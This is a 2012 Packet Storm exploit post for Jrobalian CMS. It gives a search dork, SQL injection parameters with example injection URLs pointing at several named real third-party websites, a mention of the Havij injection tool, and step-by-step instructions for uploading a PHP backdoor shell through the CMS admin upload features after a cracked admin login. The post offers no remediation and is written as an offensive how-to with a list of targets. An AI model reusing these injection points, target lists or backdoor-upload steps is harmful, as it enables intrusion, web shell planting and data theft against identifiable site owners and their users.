Jrobalian CMS SQL Injection

2012-07-22T00:00:00
ID PACKETSTORM:114954
Type packetstorm
Reporter X-Cisadane
Modified 2012-07-22T00:00:00

Description

                                        
                                            `=====================================================  
Jrobalian CMS SQL Injection Vulnerability  
=====================================================  
  
:----------------------------------------------------------------------------------------------------------------------------------------:  
: # Exploit Title : Jrobalian CMS SQL Injection Vulnerability  
: # Date : 21 July 2012  
: # Author : X-Cisadane  
: # Software Link : http://www.jrobalian.com/   
: # Version : ALL  
: # Category : Web Applications  
: # Vulnerability : SQL Injection Vulnerability & Upload Shell Vulnerability  
: # Tested On : Mozilla Firefox 7.0.1 (Windows)  
: # Greetz to : Andry Priatna, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari  
:----------------------------------------------------------------------------------------------------------------------------------------:  
DORKS  
=====  
inurl:i.php?mid=  
  
  
Proof of Concept  
================  
1.SQL Injection (With Error Notice & Without Error Notice)  
SITE TARGET.com/content/i.php?mid=[SQLi]  
OR  
SITE TARGET.com/content/i.php?mid=Integer Value&id=[SQLi]  
Example :  
http://www.daikinaircon.co.id/content/i.php?mid=4&id=41'  
http://www.investors-academy.co.id/content/i.php?mid=3&id=7'  
http://www.pdpersi.co.id/content/i.php?mid=3&id=112'  
http://www.indosuksesfutures.com/content/i.php?mid=3&id=81'  
http://www.shop4mattress.com/content/i.php?mid=69'  
  
Others :  
SITE TARGET.com/content/news.php?catid=[SQLi]  
Example :  
http://www.indosuksesfutures.com/content/news.php?catid=1'&?mid=6&id=20  
http://www.idijakbar.com/content/news.php?catid=1'  
http://www.contohwebsite.com/content/news.php?catid=1'&mid=4&id=24  
http://www.quadras.co.id/content/news.php?show=comment&id=11'  
http://www.contohwebsite.com/content/pd_events.php?mid=4&id=&catid=1'&show=archive  
http://www.daikinaircon.co.id/content/products.php?plid=1&mid=2&id=21'  
http://www.daikinaircon.co.id/content/projects.php?mid=3&ptid=13'  
http://www.daikinaircon.co.id/content/gallery.php?&mid=13&id=17'  
http://www.daikinaircon.co.id/content/downloads.php?&mid=5&id=28'  
http://www.daikinaircon.co.id/content/faqs.php?&mid=5&id=29'  
http://www.daikinaircon.co.id/content/training.php?&mid=5&id=30'  
Explore more your self...  
  
Tested With Havij - Advanced SQL Injection Tool Version 1.15 Free  
  
2.Upload Shell (Must login with admin privilege)  
If the force with you (you've successfully cracked the password) 0:) you can login with Admin privilege into CMS.  
  
Admin login page :  
SITE TARGET.com/admin/  
or  
SITE TARGET.com/content/admin/  
Example : http://www.shop4mattress.com/admin/  
  
Then Upload Shell from Administrator Modules -> Website Contents -> Newsroom & Articles -> Create NEW Articles.  
Insert an ATTACHMENT (your .php Backdoor)  
Then check Published to yes, and click SAVE!  
After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content_file/YOUR PHP BACKDOOR.php'   
  
OR you can upload PHP Shell from Administrator Modules -> Website Contents -> Downloads -> Create New file to Downloads.  
Insert Title, Description, Insert your PHP Backdoor (browse)  
Then click SAVE!  
After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content/downloads.php'  
Then Click Button 'Unduh' (Download), After that your browser will shown a pop-up to download a file, example : file21_ba.php <--- Your PHP Backdoor which automatically renamed by the CMS.  
You can access file21_ba.php by following this link 'SITE TARGET.com/downloads/Your Renamed PHP Backdoor.php'  
  
Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...!  
`